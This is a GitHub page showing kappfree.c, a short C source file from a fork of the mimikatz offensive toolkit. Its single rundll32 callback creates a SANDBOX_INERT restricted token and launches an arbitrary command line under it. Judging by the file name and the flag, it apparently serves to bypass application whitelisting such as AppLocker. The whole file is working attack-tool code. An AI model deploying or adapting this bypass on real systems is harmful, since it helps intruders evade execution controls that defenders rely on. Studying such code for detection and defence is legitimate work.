forked from gentilkiwi/mimikatz
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkappfree.c
31 lines (28 loc) · 1.05 KB
/
kappfree.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "utils.h"
void CALLBACK kappfree_startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
{
HANDLE monToken, monSuperToken;
PROCESS_INFORMATION mesInfosProcess;
STARTUPINFO mesInfosDemarrer;
RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
mesInfosDemarrer.cb = sizeof(STARTUPINFO);
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY, &monToken))
{
if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
{
if(CreateProcessAsUser(monSuperToken, NULL, lpszCmdLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
{
CloseHandle(mesInfosProcess.hThread);
CloseHandle(mesInfosProcess.hProcess);
}
CloseHandle(monSuperToken);
}
CloseHandle(monToken);
}
}